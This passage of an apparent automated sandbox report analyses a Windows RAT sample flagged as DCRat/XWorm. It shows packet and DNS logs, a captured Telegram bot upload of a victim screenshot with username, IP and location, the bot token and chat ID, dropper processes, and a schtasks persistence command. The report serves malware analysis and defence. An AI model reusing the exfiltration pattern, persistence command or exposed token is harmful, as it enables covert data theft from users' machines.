                                                                                            Mar 29, 2024 15:27:00.662059069 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.662062883 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.662188053 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.662192106 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.663580894 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.663593054 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.663738966 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.663746119 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.663781881 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.663788080 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.663820982 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.663826942 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664031029 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664037943 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664066076 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664072990 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664115906 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664123058 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664154053 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664159060 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664200068 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664206028 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664244890 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664252996 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664273977 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664278030 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664432049 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664438009 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664452076 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664469957 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664501905 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664508104 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664589882 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664594889 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664616108 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664624929 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664707899 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664715052 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664752007 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664758921 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664781094 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664787054 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664882898 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664890051 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664923906 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664935112 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.664964914 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.664971113 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.665282011 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.665287971 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.665410995 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.665417910 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.665524960 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.665548086 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.819519043 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.868206024 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:01.770612001 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:01.770699978 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:01.770737886 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:01.771286011 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:01.774596930 CET49732443192.168.2.4149.154.167.220

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 29, 2024 15:26:58.392152071 CET5585153192.168.2.41.1.1.1
                                                                                            Mar 29, 2024 15:26:58.489429951 CET53558511.1.1.1192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.788223028 CET5528253192.168.2.41.1.1.1
                                                                                            Mar 29, 2024 15:26:59.885385036 CET53552821.1.1.1192.168.2.4

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Mar 29, 2024 15:26:58.392152071 CET192.168.2.41.1.1.10x8ee3Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                            Mar 29, 2024 15:26:59.788223028 CET192.168.2.41.1.1.10x62c2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Mar 29, 2024 15:26:58.489429951 CET1.1.1.1192.168.2.40x8ee3No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                                                            Mar 29, 2024 15:26:59.885385036 CET1.1.1.1192.168.2.40x62c2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • ipinfo.io
                                                                                            • api.telegram.org

                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.44973034.117.186.1924437784C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-03-29 14:26:58 UTC61OUTGET /ip HTTP/1.1
                                                                                            Host: ipinfo.io
                                                                                            Connection: Keep-Alive
                                                                                            2024-03-29 14:26:59 UTC361INHTTP/1.1 200 OK
                                                                                            server: nginx/1.24.0
                                                                                            date: Fri, 29 Mar 2024 14:26:58 GMT
                                                                                            content-type: text/plain; charset=utf-8
                                                                                            Content-Length: 13
                                                                                            access-control-allow-origin: *
                                                                                            x-envoy-upstream-service-time: 1
                                                                                            via: 1.1 google
                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-03-29 14:26:59 UTC13INData Raw: 31 30 32 2e 31 36 35 2e 34 38 2e 34 33
                                                                                            Data Ascii: 102.165.48.43


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.44973134.117.186.1924437784C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-03-29 14:26:59 UTC42OUTGET /country HTTP/1.1
                                                                                            Host: ipinfo.io
                                                                                            2024-03-29 14:26:59 UTC504INHTTP/1.1 200 OK
                                                                                            server: nginx/1.24.0
                                                                                            date: Fri, 29 Mar 2024 14:26:59 GMT
                                                                                            content-type: text/html; charset=utf-8
                                                                                            Content-Length: 3
                                                                                            access-control-allow-origin: *
                                                                                            x-frame-options: SAMEORIGIN
                                                                                            x-xss-protection: 1; mode=block
                                                                                            x-content-type-options: nosniff
                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                            x-envoy-upstream-service-time: 3
                                                                                            via: 1.1 google
                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-03-29 14:26:59 UTC3INData Raw: 55 53 0a
                                                                                            Data Ascii: US


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449732149.154.167.2204437784C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-03-29 14:27:00 UTC255OUTPOST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 98588
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            2024-03-29 14:27:00 UTC40OUTData Raw: 2d 2d 34 65 36 33 36 66 37 37 2d 37 65 32 31 2d 34 35 36 31 2d 39 34 61 37 2d 32 37 34 62 30 31 31 30 66 39 31 30 0d 0a
                                                                                            Data Ascii: --4e636f77-7e21-4561-94a7-274b0110f910
                                                                                            2024-03-29 14:27:00 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                            Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                            2024-03-29 14:27:00 UTC10OUTData Raw: 36 37 37 30 39 36 36 38 34 37
                                                                                            Data Ascii: 6770966847
                                                                                            2024-03-29 14:27:00 UTC131OUTData Raw: 0d 0a 2d 2d 34 65 36 33 36 66 37 37 2d 37 65 32 31 2d 34 35 36 31 2d 39 34 61 37 2d 32 37 34 62 30 31 31 30 66 39 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                            Data Ascii: --4e636f77-7e21-4561-94a7-274b0110f910Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                            2024-03-29 14:27:00 UTC159OUTData Raw: d0 98 d0 9a d0 a1 d0 92 d0 9e d0 a0 d0 9c 20 d0 a1 d0 9a d0 90 d0 a7 d0 90 d0 9b 20 d0 98 d0 94 d0 98 d0 9e d0 a2 20 21 0a 49 44 3a 20 61 30 31 33 38 33 36 32 35 63 62 34 34 62 65 35 30 33 64 32 38 31 65 63 34 30 35 32 33 62 65 36 64 63 30 62 38 30 63 66 0a 43 6f 6d 6d 65 6e 74 3a 20 78 77 6f 72 6d 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 36 34 32 32 39 34 0a 49 50 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0a 47 45 4f 3a 20 55 53 0a
                                                                                            Data Ascii: !ID: a01383625cb44be503d281ec40523be6dc0b80cfComment: xwormUsername: userPC Name: 642294IP: 102.165.48.43GEO: US
                                                                                            2024-03-29 14:27:00 UTC146OUTData Raw: 0d 0a 2d 2d 34 65 36 33 36 66 37 37 2d 37 65 32 31 2d 34 35 36 31 2d 39 34 61 37 2d 32 37 34 62 30 31 31 30 66 39 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                            Data Ascii: --4e636f77-7e21-4561-94a7-274b0110f910Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                            2024-03-29 14:27:00 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                            Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                            2024-03-29 14:27:00 UTC4096OUTData Raw: 0d 1d e8 19 ab e1 9f f9 19 f4 cf fa f8 4f e7 5a ff 00 13 f5 0b 9b 7d 67 ec 51 49 b6 1b 9b 48 8c a0 75 6d af 2e 07 d3 e6 fd 05 63 f8 6b fe 46 6d 37 fe be 53 f9 d7 a4 f8 83 c1 5a 6f 88 ef e3 bc bc 9e ed 24 48 84 40 42 ea 06 01 27 ba 9e 7e 63 5e 2e 2e b5 3a 58 d8 ce a6 dc bf ab 3e 8b 2e a5 52 b6 02 50 a7 bf 37 e8 8f 0c 04 ab 06 52 41 07 20 8e d5 be 9e 25 b8 83 57 b4 d7 21 6f f4 e5 50 97 2b d0 4d 80 06 4f fb c3 af b8 cf 71 5d ff 00 fc 2a bd 0f fe 7e f5 1f fb f8 9f fc 45 27 fc 2a bd 0f fe 7e f5 1f fb f8 9f fc 45 69 3c cb 09 3f 8a ff 00 70 e1 96 e2 e1 f0 db ef 20 f1 1f fc 93 2d 17 fd cb 6f fd 14 6b cf 6b d3 7c 73 6a 96 1e 0c b2 b3 88 b1 8e 09 62 89 4b 1e 48 54 60 33 ef c5 79 9d 56 52 d4 a9 4d af e6 7f 92 39 73 b4 e3 5a 09 ff 00 2a fc d8 94 50 68 af 50 f1 c2 b2
                                                                                            Data Ascii: OZ}gQIHum.ckFm7SZo$H@B'~c^..:X>.RP7RA %W!oP+MOq]*~E'*~Ei<?p -okk|sjbKHT`3yVRM9sZ*PhP
                                                                                            2024-03-29 14:27:00 UTC4096OUTData Raw: 4e 30 c8 a4 7a 62 9b ca e3 29 73 49 dd da df d7 de 4c 73 99 c2 2a 30 8d 95 ee f7 29 31 b4 91 f5 03 a7 43 e5 59 96 22 15 0a 40 c6 39 20 1e 40 27 24 03 c8 18 aa 93 49 67 0e a3 0e af 0d ec 53 dc c7 a5 c7 69 1d a4 71 48 24 13 79 02 23 b8 b2 04 da 0e 4e 43 12 70 06 39 c8 d8 f2 80 18 5c 63 d0 53 3c 84 0d 9f 29 41 f5 c5 55 6c bd 55 a7 18 37 f0 ff 00 c3 19 e1 f3 49 52 a9 3a 8a 3f 17 fc 39 81 a3 cb 15 8d ff 00 86 0c b3 c7 19 b0 d3 ef 60 9d e5 81 9d 23 92 43 3e cd cb b4 ee 07 7a e7 00 8e 79 ab b6 73 e9 df da 36 b7 17 57 fa 7b 5e 59 d8 95 12 8b 59 a3 b4 9a 7d e4 c6 16 34 8b e5 45 07 24 04 50 cc 3a 1c 96 ad 03 14 67 aa 29 fc 28 f2 62 c6 3c b4 c7 fb a2 b9 ff 00 b2 23 cd cc a4 d6 ff 00 8d ff 00 cc ec fe dd 9b 8d a5 04 ff 00 a5 fe 46 2b d9 40 96 57 76 33 ea b6 ef 2d d4
                                                                                            Data Ascii: N0zb)sILs*0)1CY"@9 @'$IgSiqH$y#NCp9\cS<)AUlU7IR:?9`#C>zys6W{^YY}4E$P:g)(b<#F+@Wv3-
                                                                                            2024-03-29 14:27:00 UTC4096OUTData Raw: 3e b6 ff 00 34 79 98 ca 52 8e 0b 11 46 ac 7e c5 ec fb ab 34 fd 7c fb 3f 33 9a a3 8a 5a 4e 2b ed ee 7e 60 14 51 45 00 6a f8 67 fe 46 7d 37 fe be 17 f9 d7 b5 92 00 24 90 00 e4 93 5e 29 e1 af f9 19 b4 df fa f8 4f e7 5d ce ba d3 f8 8f c4 ab e1 b8 a6 78 6c 60 88 4f 7e c8 70 5f 3f 75 3f 91 fc 7d ab e7 b3 4a 7e d3 12 93 76 4a 37 7e 97 67 d5 e4 95 3d 9e 11 b4 ae dc ac bd 6c 8d 0b 9f 1c f8 6a d6 66 8a 4d 56 32 c3 af 96 8f 20 fc d4 11 53 2e a9 6b ae 41 14 da 35 cd bd d3 43 2e f6 43 21 42 01 56 5e 78 24 75 f4 ac eb bd 6f c2 9e 13 91 74 d3 14 51 3a 80 5a 38 61 dc 47 a1 63 eb f5 e6 aa ea 97 72 5b 5b 8d 43 c2 5a 45 ac 86 ea 06 96 4b f5 45 0a 15 79 2b 8e 0e e3 e9 fc f1 c7 17 d5 e3 24 b9 62 d5 f6 6e d6 fc bf 56 7a 9f 58 9c 5b e6 92 76 dd 2b df f3 fd 11 9f e3 5d 36 55 b6
                                                                                            Data Ascii: >4yRF~4|?3ZN+~`QEjgF}7$^)O]xl`O~p_?u?}J~vJ7~g=ljfMV2 S.kA5C.C!BV^x$uotQ:Z8aGcr[[CZEKEy+$bnVzX[v+]6U
                                                                                            2024-03-29 14:27:00 UTC25INHTTP/1.1 100 Continue
                                                                                            2024-03-29 14:27:01 UTC1643INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Fri, 29 Mar 2024 14:27:01 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 1254
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            {"ok":true,"result":{"message_id":373,"from":{"id":7194985122,"is_bot":true,"first_name":"iueidsobot","username":"iueidsobot"},"chat":{"id":6770966847,"first_name":"Stm","username":"cunuid","type":"private"},"date":1711722421,"photo":[{"file_id":"AgACAgIAAxkDAAIBdWYGz7WIYLJ8M3mirhqVe33O9ht8AAJd2jEbd_c4SHz7qxptfzH9AQADAgADcwADNAQ","file_unique_id":"AQADXdoxG3f3OEh4","file_size":1172,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAAIBdWYGz7WIYLJ8M3mirhqVe33O9ht8AAJd2jEbd_c4SHz7qxptfzH9AQADAgADbQADNAQ","file_unique_id":"AQADXdoxG3f3OEhy","file_size":15924,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAAIBdWYGz7WIYLJ8M3mirhqVe33O9ht8AAJd2jEbd_c4SHz7qxptfzH9AQADAgADeAADNAQ","file_unique_id":"AQADXdoxG3f3OEh9","file_size":66524,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAAIBdWYGz7WIYLJ8M3mirhqVe33O9ht8AAJd2jEbd_c4SHz7qxptfzH9AQADAgADeQADNAQ","file_unique_id":"AQADXdoxG3f3OEh-","file_size":97969,"width":1280,"height":1024}],"caption":"\u0418\u041a\u0421\u0412\u041e\u0420\u041c \u0421\u041a\u0410\u0427\u0410\u041b \u0418\u0414\u0418\u041e\u0422 !\nID: a01383625cb44be503d281ec40523be6dc0b80cf\nComment: xworm\nUsername: user\nPC Name: 642294\nIP: 102.165.48.43\nGEO: US","caption_entities":[{"offset":119,"length":13,"type":"url"}]}}


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:15:26:48
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\Desktop\H9gMIu2HXi.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\H9gMIu2HXi.exe"
                                                                                            Imagebase:0xa20000
                                                                                            File size:1'811'992 bytes
                                                                                            MD5 hash:4FB1D8F8DFF638F2C9B382F9552B18E2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:15:26:49
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:15:26:49
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:15:26:49
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:work.exe -priverdD
                                                                                            Imagebase:0x310000
                                                                                            File size:1'481'861 bytes
                                                                                            MD5 hash:E0A16200BD098799073FCB05E9D31300
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 14%, ReversingLabs
                                                                                            • Detection: 20%, Virustotal, Browse
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:15:26:49
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"
                                                                                            Imagebase:0x720000
                                                                                            File size:1'154'243 bytes
                                                                                            MD5 hash:1C051E7154F24C6BEA5788CBE9DCB478
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 65%, ReversingLabs
                                                                                            • Detection: 58%, Virustotal, Browse
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:15:26:50
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe"
                                                                                            Imagebase:0xb90000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:15:26:53
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:15:26:53
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:15:26:53
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"
                                                                                            Imagebase:0xbc0000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 70%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:15:26:55
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
